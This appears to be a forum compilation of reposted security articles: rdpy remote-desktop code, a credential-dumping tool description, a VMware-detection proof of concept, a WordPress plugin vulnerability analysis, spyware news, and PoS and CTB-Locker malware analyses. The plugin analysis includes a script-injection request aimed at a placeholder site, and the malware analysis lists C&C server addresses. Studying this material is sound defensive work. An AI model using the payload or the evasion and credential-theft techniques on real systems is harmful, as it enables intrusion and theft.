reactor.connectTCP("XXX.XXX.XXX.XXX", 3389, MyRDPFactory())
reactor.run()

Simple RDP Server

from rdpy.protocol.rdp import rdp

class MyRDPFactory(rdp.ServerFactory):

    def buildObserver(self, controller, addr):

        class MyObserver(rdp.RDPServerObserver):

            def onReady(self):
                """
                @summary: Called when the server is ready to send and receive messages
                """

            def onKeyEventScancode(self, code, isPressed):
                """
                @summary: Event called when a keyboard event is caught in scan code format
                @param code: scan code of key
                @param isPressed: True if key is down
                @see: rdp.RDPServerObserver.onKeyEventScancode
                """

            def onKeyEventUnicode(self, code, isPressed):
                """
                @summary: Event called when a keyboard event is caught in unicode format
                @param code: unicode of key
                @param isPressed: True if key is down
                @see: rdp.RDPServerObserver.onKeyEventUnicode
                """

            def onPointerEvent(self, x, y, button, isPressed):
                """
                @summary: Event called on mouse event
                @param x: x position
                @param y: y position
                @param button: 1, 2 or 3 button
                @param isPressed: True if mouse button is pressed
                @see: rdp.RDPServerObserver.onPointerEvent
                """

            def onClose(self):
                """
                @summary: Called when the human client closes the connection
                @see: rdp.RDPServerObserver.onClose
                """

        return MyObserver(controller)

from twisted.internet import reactor
reactor.listenTCP(3389, MyRDPFactory())
reactor.run()

Simple VNC Client

from rdpy.protocol.rfb import rfb

class MyRFBFactory(rfb.ClientFactory):

    def clientConnectionLost(self, connector, reason):
        reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        reactor.stop()

    def buildObserver(self, controller, addr):

        class MyObserver(rfb.RFBClientObserver):

            def onReady(self):
                """
                @summary: Event when the network stack is ready to receive or send events
                """

            def onUpdate(self, width, height, x, y, pixelFormat, encoding, data):
                """
                @summary: Implement RFBClientObserver interface
                @param width: width of new image
                @param height: height of new image
                @param x: x position of new image
                @param y: y position of new image
                @param pixelFormat: pixelFormat structure in rfb.message.PixelFormat
                @param encoding: encoding type rfb.message.Encoding
                @param data: image data in accordance with pixel format and encoding
                """

            def onCutText(self, text):
                """
                @summary: Event when the server sends a cut text event
                @param text: text received
                """

            def onBell(self):
                """
                @summary: Event when the server sends a bell
                """

            def onClose(self):
                """
                @summary: Called when the stack is closed
                """

        return MyObserver(controller)

from twisted.internet import reactor
reactor.connectTCP("XXX.XXX.XXX.XXX", 5900, MyRFBFactory())
reactor.run()

Sursa: https://github.com/citronneur/rdpy
  16. Windows Credentials Editor (WCE) – List, Add & Change Logon Sessions Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8. Features Perform Pass-the-Hash on Windows ‘Steal’ NTLM credentials from memory (with and without code injection) ‘Steal’ Kerberos Tickets from Windows machines Use the ‘stolen’ kerberos Tickets on other Windows or Unix machines to gain access to systems and services Dump cleartext passwords stored by Windows authentication packages WCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to ‘steal’ and reuse NTLM hashes, Kerberos tickets and plaintext passwords which can then be used to compromise other machines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after compromising only one server or workstation. You can download WCE here: WCE v1.42beta (32-bit) WCE v1.42beta (64-bit) Or read more here. Sursa: http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/
17. Vmware Detection

Ladies and gentlemen – I give you yet another case of VMware detection. Unfortunately, this only works for VMware. A friend of mine, one Aaron Yool, told me of a way to detect VMware via the use of privileged instructions. Specifically the "IN" instruction, which is used for reading values from I/O ports. What the heck is that? According to the IA32 manual:

I/O ports are created in system hardware by circuitry that decodes the control, data, and address pins on the processor. These I/O ports are then configured to communicate with peripheral devices. An I/O port can be an input port, an output port, or a bidirectional port. Some I/O ports are used for transmitting data, such as to and from the transmit and receive registers, respectively, of a serial interface device. Other I/O ports are used to control peripheral devices, such as the control registers of a disk controller.

Dry material, huh? That's the Intel manual for you. Normally you can't execute this instruction on Windows in user mode – it's a SYSTEM instruction, like HLT, reserved for ring 0. On VMware, however, you can call it from ring 3. What can be done if a user mode program can run system level instructions? The sky is the limit, but think rootkit without admin. Pretty wicked stuff. Is this the case here? No, not yet anyway. For now, though, we have a simple way of checking whether we're inside VMware, PoC included. We're using SEH (Structured Exception Handling) here in case Windows complains about the instruction being privileged. Who here likes code? I do!

// ------------------------------------------------------------------------------
// THE BEER-WARE LICENSE (Revision 43):
// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a beer in return
// ------------------------------------------------------------------------------

#include <iostream>
#include <tchar.h>      // for _tmain/_TCHAR
#include <windows.h>

unsigned vmware(void)
{
    __asm{
        mov eax, 0x564d5868 // 'VMXh': VMware backdoor magic value
        mov cl, 0xa         // backdoor command 0x0a: get VMware version
        mov dx, 0x5658      // 'VX': VMware backdoor I/O port
        in eax, dx          // privileged outside ring 0; VMware handles it in ring 3
        cmp ebx, 0          // on VMware, ebx is overwritten by the backdoor
        jne matrix
        xor eax, eax
        ret
matrix:
        mov eax, 1
    };
}

int seh_filter(unsigned code, struct _EXCEPTION_POINTERS* ep)
{
    return EXCEPTION_EXECUTE_HANDLER;
}

int _tmain(int a, _TCHAR* argv[])
{
    __try
    {
        if(vmware())
            goto matrix;
    }
    __except(seh_filter(GetExceptionCode(), GetExceptionInformation()))
    {
        goto stage2;
    }

stage2:
    std::cout << "Isn't real life boring?" << std::endl;
    exit(0);

matrix:
    std::cout << "The Matrix haz you Neo..." << std::endl;
    exit(1);
}

PoC pic:

Happy hacking!

Sursa: Vmware Detection « Joe's Security Blog
18. Analysis of the Fancybox-For-WordPress Vulnerability

By Marc-Alexandre Montpas on February 16, 2015

We were alerted last week to a malware outbreak affecting WordPress sites using version 3.0.2 and lower of the fancybox-for-wordpress plugin. As announced, here are some of the details explaining how attackers could use this vulnerability to inject malicious iframes on websites using this plugin.

Technical details

This vulnerability exploited a somewhat well-known attack vector amongst WordPress plugins: unprotected "admin_init" hooks. As "admin_init" hooks can be called by anyone visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, this snippet could be used by remote attackers to change the plugin's "mfbfw" option to any desired content (a rough sketch of such a request follows below).

This got us asking ourselves: what was this option used for? We found that it was used in many places within the plugin's codebase. The one that caught our attention was inside the mfbfw_init() function, which displays jQuery scripts configured to work with parameters that were set up earlier, in mfbfw_admin_options().

As you can see from the above picture, the $settings array is not sanitized before being output to the client, which means an attacker, using the unprotected "admin_init" hook, could inject malicious Javascript payloads into every page of a vulnerable website, such as the "203koko" iframe injection we presented last week.

Sursa: http://blog.sucuri.net/2015/02/analysis-of-the-fancybox-for-wordpress-vulnerability.html
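As referenced in the write-up above, a request along these lines could reach the unprotected hook. This is a hedged sketch: the endpoint comes from the article, but the action and field names are illustrative assumptions, not the exact parameters used in the wild.

import requests

target = "http://victim.example/wp-admin/admin-post.php"  # hypothetical site
payload = {
    "action": "update",                  # assumed action the hook checks
    "page": "fancybox-for-wordpress",    # assumed plugin page slug
    # An "mfbfw" setting later echoed unsanitized by mfbfw_init():
    "mfbfw[padding]": '10"></script><script>/*injected*/</script>',
}
resp = requests.post(target, data=payload)
print(resp.status_code)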
19. Memex - DARPA's search engine for the Dark Web

by Mark Stockley on February 16, 2015 | 3 Comments

Anyone who used the World Wide Web in the nineties will know that web search has come a long way. Sure, it was easy to get more search results than you knew what to do with in 1999, but it was really hard to get good ones.

What Google did better than Alta Vista, HotBot, Yahoo and the others at the dawn of the millennium was to figure out which search results were the most relevant and respected. And so it's been ever since - search engines have become fast, simple interfaces that compete based on relevance and earn money from advertising.

Meanwhile, the methods for finding things to put in the search results have remained largely the same - you either tell the search engines your site exists or they find it by following a link on somebody else's website.

That business model has worked extremely well but there's one thing that it does not excel at - depth. If you don't declare your site's existence and nobody links to it, it doesn't exist - in search engine land at least.

Google's stated aim may be to organize the world's information and make it universally accessible and useful, but it hasn't succeeded yet. That's not just because it's difficult, it's also because Google is a business and there isn't a strong commercial imperative for it to index everything.

Estimates of how much of the web has been indexed vary wildly (I've seen figures of 0.04% and 76%, so we can perhaps narrow it down to somewhere between almost none and almost all) but one thing is sure: there's enough stuff that hasn't been indexed that it's got its own name - the Deep Web. It's not out of the question to suggest that the part of the web that hasn't been indexed is actually bigger than the part that has.

A subset of it - the part hosted on Tor Hidden Services and referred to as the Dark Web - is very interesting to those in law enforcement. There are all manner of people, sites and services that operate over the web that would rather not appear in your Google search results. If you're a terrorist, paedophile, gun-runner, drug dealer, sex trafficker or serious criminal of that ilk then the shadows of the Deep Web, and particularly the Dark Web, offer a safer haven than the part occupied by, say, Naked Security or Wikipedia.

Enter Memex, brainchild of the boffins at DARPA, the US government agency that built the internet (then ARPANET). DARPA describes Memex as a set of search tools that are better suited to government (presumably law enforcement and intelligence) use than commercial search engines.

Whereas Google and Bing are designed to be good-enough systems that work for everyone, Memex will end up powering domain-specific searches that are the very best solution for specific narrow interests (such as certain types of crime):

Today's web searches use a centralized, one-size-fits-all approach that searches the internet with the same set of tools for all queries. While that model has been wildly successful commercially, it does not work well for many government use cases. The goal is for users to ... quickly and thoroughly organize subsets of information based on individual interests ... and to improve the ability of military, government and commercial enterprises to find and organize mission-critical publically [sic] available information on the internet.

Although Memex will eventually have a very broad range of applications, the project's initial focus is on tackling human trafficking and slavery.
According to DARPA, human trafficking has a significant Dark Web presence in the form of forums, advertisements, job postings and hidden services (anonymous sites available via Tor). Memex has been available to a few law enforcement agencies for about a year and has already been used with some success.

In September 2014, sex trafficker Benjamin Gaston was sentenced to a minimum of 50 years in prison having been found guilty of "Sex Trafficking, as well as Kidnapping, Criminal Sexual Act, Rape, Assault, and Sex Abuse - all in the First Degree". Scientific American reports that Memex was in the thick of it:

A key weapon in the prosecutor's arsenal, according to the NYDA's Office: an experimental set of internet search tools the US Department of Defense is developing to help catch and lock up human traffickers.

The journal also reports that Memex is used by the New York County District Attorney's Office in every case pursued by its Human Trafficking Response Unit, and that it has played a role in generating at least 20 active sex trafficking investigations.

If Memex carries on like this then we'll have to think of a new name for the Dark Web.

Sursa: https://nakedsecurity.sophos.com/2015/02/16/memex-darpas-search-engine-for-the-dark-web/
20. Russian researchers expose breakthrough U.S. spying program

BY JOSEPH MENN | SAN FRANCISCO, Mon Feb 16, 2015 5:10pm EST

(Reuters) - The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0)

The firm declined to publicly name the country behind the spying campaign, but said it was closely linked to Stuxnet, the NSA-led cyberweapon that was used to attack Iran's uranium enrichment facility. The NSA is the agency responsible for gathering electronic intelligence on behalf of the United States.

A former NSA employee told Reuters that Kaspersky's analysis was correct, and that people still in the intelligence agency valued these spying programs as highly as Stuxnet. Another former intelligence operative confirmed that the NSA had developed the prized technique of concealing spyware in hard drives, but said he did not know which spy efforts relied on it.

NSA spokeswoman Vanee Vines declined to comment.

Kaspersky published the technical details of its research on Monday, which should help infected institutions detect the spying programs, some of which trace back as far as 2001.

The disclosure could further hurt the NSA's surveillance abilities, already damaged by massive leaks by former contractor Edward Snowden. Snowden's revelations have hurt the United States' relations with some allies and slowed the sales of U.S. technology products abroad.

The exposure of these new spying tools could lead to greater backlash against Western technology, particularly in countries such as China, which is already drafting regulations that would require most bank technology suppliers to proffer copies of their software code for inspection.

Peter Swire, one of five members of U.S. President Barack Obama's Review Group on Intelligence and Communications Technology, said the Kaspersky report showed that it is essential for the country to consider the possible impact on trade and diplomatic relations before deciding to use its knowledge of software flaws for intelligence gathering.

"There can be serious negative effects on other U.S. interests," Swire said.

TECHNOLOGICAL BREAKTHROUGH

According to Kaspersky, the spies made a technological breakthrough by figuring out how to lodge malicious software in the obscure code called firmware that launches every time a computer is turned on.

Disk drive firmware is viewed by spies and cybersecurity experts as the second-most valuable real estate on a PC for a hacker, second only to the BIOS code invoked automatically as a computer boots up.

"The hardware will be able to infect the computer over and over," lead Kaspersky researcher Costin Raiu said in an interview.
Though the leaders of the still-active espionage campaign could have taken control of thousands of PCs, giving them the ability to steal files or eavesdrop on anything they wanted, the spies were selective and only established full remote control over machines belonging to the most desirable foreign targets, according to Raiu. He said Kaspersky found only a few especially high-value computers with the hard-drive infections.

Kaspersky's reconstructions of the spying programs show that they could work in disk drives sold by more than a dozen companies, comprising essentially the entire market. They include Western Digital Corp, Seagate Technology Plc, Toshiba Corp, IBM, Micron Technology Inc and Samsung Electronics Co Ltd.

Western Digital, Seagate and Micron said they had no knowledge of these spying programs. Toshiba and Samsung declined to comment. IBM did not respond to requests for comment.

GETTING THE SOURCE CODE

Raiu said the authors of the spying programs must have had access to the proprietary source code that directs the actions of the hard drives. That code can serve as a roadmap to vulnerabilities, allowing those who study it to launch attacks much more easily.

"There is zero chance that someone could rewrite the [hard drive] operating system using public information," Raiu said.

Concerns about access to source code flared after a series of high-profile cyberattacks on Google Inc and other U.S. companies in 2009 that were blamed on China. Investigators have said they found evidence that the hackers gained access to source code from several big U.S. tech and defense companies.

It is not clear how the NSA may have obtained the hard drives' source code. Western Digital spokesman Steve Shattuck said the company "has not provided its source code to government agencies." The other hard drive makers would not say if they had shared their source code with the NSA. Seagate spokesman Clive Over said it has "secure measures to prevent tampering or reverse engineering of its firmware and other technologies." Micron spokesman Daniel Francisco said the company took the security of its products seriously and "we are not aware of any instances of foreign code."

According to former intelligence operatives, the NSA has multiple ways of obtaining source code from tech companies, including asking directly and posing as a software developer. If a company wants to sell products to the Pentagon or another sensitive U.S. agency, the government can request a security audit to make sure the source code is safe.

"They don't admit it, but they do say, 'We're going to do an evaluation, we need the source code,'" said Vincent Liu, a partner at security consulting firm Bishop Fox and former NSA analyst. "It's usually the NSA doing the evaluation, and it's a pretty small leap to say they're going to keep that source code."

Kaspersky called the authors of the spying program "the Equation group," named after their embrace of complex encryption formulas. The group used a variety of means to spread other spying programs, such as by compromising jihadist websites, infecting USB sticks and CDs, and developing a self-spreading computer worm called Fanny, Kaspersky said.

Fanny was like Stuxnet in that it exploited two of the same undisclosed software flaws, known as "zero days," which strongly suggested collaboration by the authors, Raiu said. He added that it was "quite possible" that the Equation group used Fanny to scout out targets for Stuxnet in Iran and spread the virus.
(Reporting by Joseph Menn; Editing by Tiffany Wu)

Sursa: Russian researchers expose breakthrough U.S. spying program | Reuters
21. DbgKit

February 15, 2015 | Permalink

DbgKit is the first GUI extension for Debugging Tools for Windows. It will show you a hierarchical view of processes and detailed information about each process, including its full image path, command line, start time, memory statistics, vads, handles, threads, security attributes, modules, environment variables and more.

WARNING: Using debugger extensions in a local kernel-mode debugging session, or with tools like LiveKd that simulate local kernel debugging, can cause the extensions to hang or to show imprecise data.

Download

Sursa: Andrey Bazhan · DbgKit
22. Signed PoS Malware Used In Pre-Holiday Attacks, Linked to Targeted Attacks

1:04 pm (UTC-7) | by Jay Yaneza (Threats Analyst)

Last year, we detected some new PoS malware just before the holiday season. At that time, we omitted mentioning one fact – that the file was digitally signed with a valid certificate. Our research shows that these PoS malware attacks are growing in sophistication, with code signing and improved encryption becoming more commonplace. We were also able to connect this PoS malware to the group involved with the Anunak malware, which is related to the Carbanak gang as posted by our colleagues over at Fox-IT.

Figure 1. Sample with valid digital signature (taken on November 27, 2014)

Malware code signing has increased in recent years, and malware authors often seek keys that allow file signing to make malicious files appear as legitimate software. In this case, the attackers went through the whole process of requesting a digital certificate to sign the binary from a known certificate authority. COMODO, the issuer of this certificate, has since revoked the signing certificate. With this in mind, we began searching for additional components of this binary. This blog entry adds context to our original blog post published last year.

Carefully crafted binaries

Based on other PoS malware that we have observed, we knew that this should be a multicomponent malware. Over the next couple of months after this incident we monitored this threat; one file that caught our interest had the SHA1 hash d8e79a7d21a138bc02ec99cfb9dc59e2e0cedf09. We noted some important things about this particular file:

First, the file itself was signed similarly: it used the same name, email and certificate authority. Secondly, the file construction was just too careful for the standard malware we see on a daily basis. Analysis of the file showed that it has its own encryption method that cannot be identified by common tools, and that it only decrypts the necessary code, which is destroyed after being used. Another interesting thing is that the GetProcAddress API was used (which is almost abandoned nowadays); it uses a brute-force search of the PE header table to call NT* functions. During installation, the .text section is reused by the unpacking code and installation, as seen below:

Figure 2. Section reuse

It then starts the host process svchost.exe with the parameters -k netsvc, in a suspended state. Once done, it proceeds to prepare a decrypted PE image file which can be written into memory. If everything is ready, it calls the NT* function to write the PE image into the host's process memory, set the thread context and resume the thread. Finally, the PE image in memory is destroyed immediately.

Figure 3. CreateProcess with suspended creation state
Figure 4. Decrypted PE image file in memory

While the PE image loaded in memory can be dumped to file, the strings and API calls are still protected, and deciphering them is not straightforward. A decoder table was necessary to understand the inner workings of the file, as shown below:

Figure 5. Decoder table
Using homemade decryption tools, the following functionality was discovered:

Two fixed C&C servers: 83.166.234.250 (ports 80 and 443) and 83.166.234.237 (port 443)
Searching for the NSB Retail System logs at C:\NSB\Coalition\Logs and nsb.pos.client.log
Searching for files with the following extensions: bml cgi gif htm html jpg php png pst shtml txt
The use of VNC and Remote Desktop
Modifying the settings of the Windows firewall to give itself network access
Database connectivity
Reference to mimikatz – a tool to recover cleartext passwords from LSASS
Encryption and decryption routines
Keylogging functionality

Targeting the Top PoS Vendor: Epicor

This was not your run-of-the-mill malware. It was point-of-sale (PoS) malware that explicitly targeted the Epicor/NSB PoS system. Epicor was recently recognized as the top vendor of PoS software and the leader in number of accounts and revenue over other top PoS vendors.

A second look at the binary indicates that this particular file is related to the CARBERP banking family of Trojans, whose source code was leaked around 2013. In particular, this file had the following CARBERP plugins:

plug and vnc.plug – VNC plugin
plug – iFOBS remote banking system
plug – Ammy Remote Desktop plugin

We went back and cross-referenced other files to look for other complex malware samples that could be linked to this particular sample. We came across another one (SHA1 hash: a0527db046665ee43205f963dd40c455219beddd) which shared almost similar complexity. Some of its significant characteristics are listed below:

It drops a file called ms*.exe and creates a startup item under the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run key (a rough registry check for this is sketched after this section).

Figure 6. Created registry entry

Aside from this, it changes the Zone.Identifier alternate data stream to avoid the pop-up warning:

Figure 7. Alternate data stream

It attempts to acquire elevated privileges via SeRestorePrivilege, SeBackUpPrivilege, and SeDebugPrivilege. Privileges like these allow the caller all access to a process, including the ability to call TerminateProcess(), CreateRemoteThread(), and other potentially dangerous API calls on the target process. It also has anti-debugging functions, and its own dynamic unpacking code:

Unpack code into .txt and jump back
Allocate a block of memory at 0x7FF90000 (almost reaching the user mode limit)
Unpack code into 0x7FF90000 and jump there

C&C server communication

Using feedback provided by our Smart Protection Network, we looked for other threats that were similar to these two samples.

A quick evolution

We saw a file that was similar to the above files located in C:\Windows\SysWOW64 (for Windows 64-bit) and C:\Windows\System32 (for Windows 32-bit). The difference, however, was that this was a DLL file (SHA1 hash: CCAD1C5037CE2A7A39F4B571FC10BE213249E611). Careful analysis revealed that, although compiled as a DLL, it uses the same cipher as the earlier samples. However, a different C&C server was used (5.61.38.52:443). This change may have been an attempt to evade analysis, as some automated analysis tools do not process DLLs since they cannot be directly executed.

Figure 8. Decoder table

These indicators show that these file(s) were the work of a fairly sophisticated group of attackers. Who's responsible for this? As it turns out, we can attribute this to the European APT group that uses the Anunak malware, which was previously reported by Group-IB and Fox-IT.
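As noted above, the sample persists via the policies\Explorer\Run key. Here is a minimal, illustrative IOC check (an assumption-based sketch of my own, not Trend Micro tooling) that lists entries under that key so unexpected ms*.exe values can be reviewed:

import winreg

KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"

def list_policy_run_entries():
    entries = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as k:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(k, i)
                    entries.append((name, value))
                    i += 1
                except OSError:   # no more values under this key
                    break
    except FileNotFoundError:
        pass  # key absent: no persistence entries registered here
    return entries

for name, value in list_policy_run_entries():
    print(name, "=>", value)  # flag unexpected ms*.exe-style entries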
Our research leads us to believe that the files listed below could be used in similar campaigns within the United States and Canada:

Table 1. List of hashes and detection names (click to enlarge)
Table 2. List of hashes and C&C servers (click to enlarge)

It should be noted that two files listed here (5fa2a0639897a42932272d0f0be2ab456d99a402 and CCAD1C5037CE2A7A39F4B571FC10BE213249E611) have fake compile-time dates, a visible attempt to mask the files' validity. According to the certificate revocation list, the certificates used to sign these malicious files were revoked on August 05, 2014.

Figure 9. Certificate Revocation List

However, files were still being signed with the certificates beyond that date. Here is the list of the files with digital certificates, and their signing time:

Table 3. Time and date of malware signing

Summary

Trend Micro already detects all files listed above, where applicable. We would also like to recommend these steps in order to catch these kinds of attacks earlier:

Audit accounts for failed/irregular logins. As seen from one of the tools used in this campaign, a password/credential dumper was used. A user account suddenly accessing a resource that looks unusual may be a sign.
Audit network logs for abnormal connections. A network scanner, which can be used to enumerate a host's resources, was also used in this campaign. A passive network scanner, which observes anomalies in network traffic, can be used to flag these events and is often built-in functionality of a breach detection system.
Study warnings from security solutions. If you see a combination of hacking tools, backdoors and Trojans on a particular host, it is worth determining quickly whether these detections are of immediate concern. In a world where a lot of malware is seen on a daily basis, it is important to know which malware could severely affect your business.

For a full list of things to check, you can refer to 7 Places to Check for Signs of a Targeted Attack in Your Network. To learn more about PoS RAM scraper malware, you can refer to our previous research paper titled PoS RAM Scraper Malware: Past, Present and Future.

Additional information and analysis by Abraham Camba, Jane Hsieh, and Kenney Lu.

Sursa: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-used-in-pre-holiday-attacks-linked-to-targeted-attacks/
23. CTB-Locker encryption/decryption scheme in details

After my last post about CTB-Locker I received a lot of e-mails from people asking for a complete analysis of the malware. Most of them wanted to know if it's possible to restore the compromised files without paying the ransom. The answer is simple: it's impossible without knowing the Master key! That key resides on the malicious server and it's the only way to restore every single compromised file.

There are some articles on the net about CTB-Locker's modus operandi. Everyone knows that ZLib is used, AES is used, but only few of them mention the use of SHA256+Curve. To explain everything in detail I'll show you how encryption/decryption is done, step by step.

Preamble: HIDDENINFO

The HiddenInfo file is the core of the malware; it's full of precious data. There's no need to explain every field of the file: a closer look at the first part of it will suffice, because it plays an important part in the encryption/decryption scheme.

DCE1C1 call ds:CryptGenRandom
DCE1C7 lea eax, [ebp+systemTimeAsFileTime]
DCE1CA push eax
DCE1CB call ds:GetSystemTimeAsFileTime
DCE1D1 call ds:GetTickCount
DCE1D7 mov [ebp+gettickcountVal], eax
DCE1DA call ds:GetCurrentThreadId
DCE1E0 mov esi, eax
DCE1E2 rol esi, 10h            ; Shift ThreadID
DCE1E5 call ds:GetCurrentProcessId
DCE1EB xor eax, esi            ; ThreadID and ProcessID values inside the same dword
DCE1ED mov [ebp+threadID_processID], eax
DCE1F0 mov esi, 0EB7910h
DCE1F5 lea edi, [ebp+machineGuid]
DCE1F8 movsd                   ; Move MachineGUID
DCE1F9 movsd
DCE1FA movsd
DCE1FB lea eax, [ebp+random]   ; Random sequence of bytes
DCE1FE push 34h                ; Number of bytes to hash
DCE200 push eax                ; Sequence of bytes to hash
DCE201 mov ecx, ebx            ; Output buffer
DCE203 movsd
DCE204 call SHA256             ; SHA256(random)
DCE209 mov al, [ebx+1Fh]
DCE20C and byte ptr [ebx], 0F8h
DCE20F push 0E98718h           ; Basepoint
DCE214 and al, 3Fh
DCE216 push ebx                ; SHA256(random)
DCE217 push [ebp+outputBuffer] ; Public key
DCE21A or al, 40h
DCE21C mov [ebx+1Fh], al
DCE21F call curve_25519

The snippet is part of a procedure I called GenSecretAndPublicKeys. The secret key is obtained by applying SHA256 to a random sequence of 0x34 bytes composed of:

0x14 bytes: from the CryptGenRandom function
0x08 bytes: from GetSystemTimeAsFileTime
0x04 bytes: from GetTickCount
0x04 bytes: from (ThreadID ^ ProcessID)
0x10 bytes: MachineGuid

Curve25519 is used to generate the corresponding public key. You can recognize the algorithm from the Basepoint vector, because it's a 0x09 byte followed by a series of 0x00 bytes. (For a quick overview of the elliptic curve algorithm used by the malware take a look here: Curve25519: high-speed elliptic-curve cryptography.)

GenSecretAndPublicKeys is called two times, so two private and two public keys are created. I'll name them ASecret, APublic, BSecret and BPublic. A minimal sketch of this key generation follows below.
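Here is a minimal Python sketch of GenSecretAndPublicKeys as described above: SHA256 over 0x34 gathered bytes, the bit clamping visible in the disassembly (and 0F8h / and 3Fh / or 40h), and a curve25519 scalar multiplication by the basepoint. It assumes the PyNaCl bindings are available; the malware of course uses its own inlined implementation.

import hashlib
import os
from nacl.bindings import crypto_scalarmult_base

def gen_secret_and_public():
    # The malware hashes 0x34 bytes gathered from CryptGenRandom,
    # GetSystemTimeAsFileTime, GetTickCount, ThreadID^ProcessID and
    # MachineGuid; os.urandom stands in for that entropy here.
    secret = bytearray(hashlib.sha256(os.urandom(0x34)).digest())
    # Bit clamping, exactly as in the asm snippet above:
    secret[0] &= 0xF8                         # and byte ptr [ebx], 0F8h
    secret[31] = (secret[31] & 0x3F) | 0x40   # and al, 3Fh / or al, 40h
    secret = bytes(secret)
    public = crypto_scalarmult_base(secret)   # curve_25519(public, secret, BasePoint)
    return secret, public

a_secret, a_public = gen_secret_and_public()
b_secret, b_public = gen_secret_and_public()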
[TABLE=width: 669] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code]DCF1E7 mov [esp+274h+public], offset MasterPublic ; MPublic key DCF1EE push eax ; BSecret DCF1EF lea eax, [ebp+Shared_1] ; Shared_1 DCF1F5 push eax DCF1F6 call curve_25519 DCF1FB add esp, 0Ch DCF1FE lea eax, [ebp+Shared_1] DCF204 push 20h DCF206 push eax DCF207 lea ecx, [ebp+aesKey] ; Hash is saved here DCF20A call SHA256 [/TD] [/TR] [/TABLE] SHA256(curve_25519(Shared_1, BSecret, MPublic)) Shared secret computation takes place. MPublic is the Master public key and it’s visible inside the memory address space of the malware. The Master secret key remains on the malicious server. To locate the Master public key is pretty easy because it’s between the information section (sequence of info in various languages) and the “.onion” address. Shared secret is then putted inside SHA256 hash algorithm, and the result is used as a key for AES encryption: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: code]DCF20F lea eax, [ebp+aesExpandedKey] DCF215 push eax DCF216 mov edx, 100h DCF21B lea ecx, [ebp+aesKey] DCF21E call AEXExpandKey DCF223 add esp, 0Ch DCF226 xor edi, edi DCF228 lea ecx, [ebp+aesExpandedKey] DCF22E lea eax, [edi+0EF71ACh] DCF234 push ecx DCF235 push eax DCF236 push eax DCF237 call AES_ENCRYPT ; AES encryption [/TD] [/TR] [/TABLE] The malware encrypts a block of bytes (named SecretInfo) composed by: [TABLE=width: 630] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]SecretInfo: ASecret ; a secret key generated by GenSecretAndPublicKeys MachineGuid ; Used to identify the infected machine Various information (fixed value, checksum val among others) [/TD] [/TR] [/TABLE] Not so hard but it’s better to outline everything: ASecret = SHA256(0x34_random_bytes) Curve_25519(APublic, ASecret, BasePoint) BSecret = SHA256(0x34_random_bytes) Curve_25519(BPublic, BSecret, BasePoint) Curve_25519(Shared_1, BSecret, MPublic) AES_KEY_1 = SHA256(Shared_1) Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1) Part of these informations are saved inside HiddenInfo file, more precisely at the beginning of it: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]HiddenInfo: +0x00 offset: APublic +0x24 offset: BPublic +0x44 offset: Encrypted_SecretInfo [/TD] [/TR] [/TABLE] So, two public keys are visible, but private key ASecret is encrypted. It’s impossible to get the real ASecret value without the AES key… Ok, now that you know how HiddenInfo file is created I can start with the file encryption scheme. CTB-Locker file encryption [TABLE=width: 1138] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [/TD] [TD=class: code]C74834 lea eax, [ebp+50h+var_124] ; Hash will be saved here C7483A push eax C7483B lea eax, [ebp+50h+var_E4] C74841 push 30h C74843 lea edi, [ebp+50h+var_D4] C74849 push eax ; 0x30 random bytes C7484A rep movsd C7484C call SHA256Hash ... 
Ok, now that you know how the HiddenInfo file is created, I can start with the file encryption scheme.

CTB-Locker file encryption

C74834 lea eax, [ebp+50h+var_124] ; Hash will be saved here
C7483A push eax
C7483B lea eax, [ebp+50h+var_E4]
C74841 push 30h
C74843 lea edi, [ebp+50h+var_D4]
C74849 push eax ; 0x30 random bytes
C7484A rep movsd
C7484C call SHA256Hash
...
C7486E push eax ; BasePoint
C7486F lea eax, [ebp+50h+var_124]
C74875 push eax ; CSecret: SHA256(0x30_random_bytes)
C74876 lea eax, [ebp+50h+var_B4]
C74879 push eax ; CPublic
C7487A call curve25519 ; Generate a public key
C7487F push offset dword_C943B8 ; DPublic: first 32 bytes of HiddenInfo
C74884 lea eax, [ebp+50h+var_124]
C7488A push eax ; CSecret
C7488B lea eax, [ebp+50h+var_164]
